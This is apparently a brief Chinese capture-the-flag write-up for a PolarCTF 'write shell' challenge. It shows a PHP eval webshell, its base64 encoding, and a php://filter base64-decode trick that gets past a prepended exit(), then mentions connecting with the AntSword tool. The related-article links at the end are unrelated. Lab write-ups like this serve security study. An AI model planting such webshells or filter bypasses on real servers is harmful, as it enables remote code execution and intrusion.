Polarctf 写shell

代码审计,发现写进去的东西会加上exit,这样的话后面的内容就不能执,那就写个过滤器进行绕过,重点是考虑一下base64的解码位置,构造一句话木马,

使用base64的话

<?php eval($_POST'a');

Base64 编码后:PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7

需要给前面随便补充一位,过滤器是php://filter/write=convert.base64-decode/resource=shell.php

写入成功后用蚁剑连接

相关推荐
云水一下1 小时前
DVWA从入门到精通(四):CSRF(跨站请求伪造)
安全·csrf·dvwa
tuddy7894641 小时前
Codex++ 安全边界探秘:从模型能力到风险防御
人工智能·python·安全
hbugs0012 小时前
【案例分享】全网首个华三数据中心流量可视化实验,基于EVE-NG V7平台
网络·网络协议·安全·devops·eve-ng
深盾科技_Virbox2 小时前
深盾科技·Virbox产品体系全景解读:软件安全如何从加密锁走向全生命周期
java·大数据·算法·安全·软件需求
云边云科技_云网融合2 小时前
零信任安全:数字化时代的企业防护新范式
人工智能·安全·ai
菩提小狗2 小时前
每日安全情报报告 · 2026-07-03
网络安全·漏洞·cve·安全情报·每日安全
thinking_talk3 小时前
腾讯云AI Agent安全中心综合评测
人工智能·安全·腾讯云
山东穆柯传感器3 小时前
安全触边损坏如何维修及更换配件
网络·安全
Rocket-Luo3 小时前
谈谈企业中的网络安全
网络·安全·web安全
HavenlonLabs4 小时前
Havenlon 思考录(十一):系统的冷,不是对人,而是对风险
人工智能·安全威胁分析·安全架构·havenlon